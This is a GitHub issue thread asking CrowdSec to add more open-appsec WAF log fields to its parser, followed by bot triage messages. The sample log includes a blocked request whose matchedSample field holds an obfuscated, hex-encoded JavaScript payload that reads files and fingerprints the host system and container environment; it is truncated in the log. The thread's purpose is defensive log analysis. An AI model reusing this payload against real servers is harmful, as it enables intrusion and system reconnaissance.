Enhancing open-appsec logs in CrowdSec for better incident analysis

[marnit0412-cpu]

The parser needed a little bit updating and added target_fqdn property to the meta object which will be shown.

I took the presumption that httpHostName will have the information you are looking for.

If your on the latest version of crowdsec running cscli hub update && cscli hub upgrade will download the new format and restarting crowdsec will start generating event with the new meta field.

Thanks! That's what I meant.

Can you also add parameters such as:

1. httpUriPath
2. httpUriQuery
3. httpMethod
4. waapFoundIndicators
5. learnedIndicators
6. waapUserReputationScore
7. waapUserReputation
8. waapUriFalsePositiveScore
9. waapKeywordsScore
10. waapFinalScore
11. waapCalculatedThreatLevel
12. eventReferenceId

These parameters will help with analyzing alerts/incidents. Especially during the stage when open-appsec is in learning mode.
Below I'm sending a complete example log from open-appsec

Details

`
{
"eventTime": "2026-02-13T20:10:53.367",
"eventName": "Web Request",
"eventSeverity": "Critical",
"eventPriority": "High",
"eventType": "Event Driven",
"eventLevel": "Log",
"eventLogLevel": "info",
"eventAudience": "Security",
"eventAudienceTeam": "",
"eventFrequency": 0,
"eventTags": [
"Threat Prevention",
"Web Application & API Protection"
],
"eventSource": {
"agentId": "a0af8d4e-5a98-467c-94f0-06fb384128d8",
"eventTraceId": "",
"eventSpanId": "",
"issuingEngineVersion": "1.1.33-open-source",
"serviceName": "HTTP Transaction Handler",
"serviceId": "1",
"assetId": "web.test.pl",
"assetName": "web.test.pl"
},
"eventData": {
"logIndex": 117,
"eventReferenceId": "8e91f7b8-5e4b-4cf9-9424-3b88c100c703",
"assetId": "web.test.pl",
"assetName": "web.test.pl",
"eventConfidence": "Very High",
"sourceIP": "x.x.x.x",
"httpSourceId": "x.x.x.x",
"sourcePort": 0,
"httpHostName": "web.test.pl",
"httpMethod": "POST",
"assetId": "web.test.pl",
"assetName": "web.test.pl",
"httpUriPath": "/",
"httpUriQuery": "",
"ruleId": "web.test.pl",
"securityAction": "Prevent",
"waapOverride": "None",
"practiceType": "Threat Prevention",
"practiceSubType": "Web Application",
"ruleName": "web.test.pl",
"practiceId": "5426d613-cd8e-4bfc-b0ed-38c1b9b35938",
"practiceName": "local_policy/practice-prevent-and-learn",
"waapIncidentType": "Cross Site Scripting, LDAP Injection, Path Traversal, Remote Code Execution, SQL Injection",
"matchedSample": "var reject_bridge=arguments[1];promise.all([import('node:zlib')]).then(([zlib])=>new promise((resolve,reject)=>{try{var c=global[string.fromcharcode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327293b636f6e73742066733d617761697420696d706f72742827667327293b636f6e737420706174683d617761697420696d706f727428277061746827293b636f6e737420726561643d2870293d3e7b7472797b72657475726e2066732e7265616446696c6553796e6328702c277574663827293b7d63617463682865297b72657475726e27273b7d7d3b636f6e7374206578697374733d2870293d3e7b7472797b66732e61636365737353796e632870293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e7374207772697461626c653d2870293d3e7b7472797b66732e61636365737353796e6328702c66732e636f6e7374616e74732e575f4f4b293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e737420637075733d6f732e6370757328293b636f6e7374206d656d3d6f732e746f74616c6d656d28293b636f6e737420706c6174666f726d3d6f732e706c6174666f726d28293b6c657420757365723d27756e6b6e6f776e273b7472797b757365723d6f732e75736572496e666f28292e757365726e616d653b7d63617463682865297b757365723d70726f636573732e656e762e555345527c7c70726f636573732e656e762e555345524e414d457c7c27756e6b6e6f776e273b7d0a6c657420656e765f747970653d274d4554414c273b69662870726f636573732e656e762e4b554245524e455445535f534552564943455f484f53547c7c70726f636573732e656e762e444f434b45525f484f53547c7c70726f636573732e656e762e4157535f455845435554494f4e5f454e567c7c70726f636573732e656e76",
"matchedLocation": "body",
"matchedParameter": "0._response._prefix",
"waapFoundIndicators": "[', .assign(, ;, =, >, ]., all, catch(, code_execution_fast_reg_0, eval(, fn_name_pass_regex_0, from, import(, ldap_injection_regex_2, regex_postfix_1, regex_xss_3, repetition, ssti_fast_reg_4, string., string.fromcharcode, tostring(, xpath_injeciton_regex_3, xpath_injection_regex_1, }}]",
"matchedIndicators": "[', .assign(, ;, =, >, ]., all, catch(, code_execution_fast_reg_0, eval(, fn_name_pass_regex_0, from, import(, ldap_injection_regex_2, regex_postfix_1, regex_xss_3, repetition, ssti_fast_reg_4, string., string.fromcharcode, tostring(, xpath_injeciton_regex_3, xpath_injection_regex_1, }}]",
"learnedIndicators": "",
"waapUserReputationScore": 183,
"waapUserReputation": "Low",
"waapUriFalsePositiveScore": 864,
"waapKeywordsScore": 970,
"reservedNgenA": 0,
"waapFinalScore": 1000,
"waapCalculatedThreatLevel": 4
}
}

`

Originally posted by @marnit0412-cpu in #4307

[github-actions]

@marnit0412-cpu: Thanks for opening an issue, it is currently awaiting triage.

In the meantime, you can:

1. Check Crowdsec Documentation to see if your issue can be self resolved.
2. You can also join our Discord.
3. Check Releases to make sure your agent is on the latest version.

Details

I am a bot created to help the crowdsecurity developers manage community feedback and contributions. You can check out my manifest file to understand my behavior and what I can do. If you want to use this for your project, you can check out the BirthdayResearch/oss-governance-bot repository.

[github-actions]

@marnit0412-cpu: There are no 'kind' label on this issue. You need a 'kind' label to start the triage process.

• /kind feature
• /kind enhancement
• /kind refactoring
• /kind bug
• /kind packaging

Details

I am a bot created to help the crowdsecurity developers manage community feedback and contributions. You can check out my manifest file to understand my behavior and what I can do. If you want to use this for your project, you can check out the BirthdayResearch/oss-governance-bot repository.

[marnit0412-cpu]

/kind bug /kind enhancement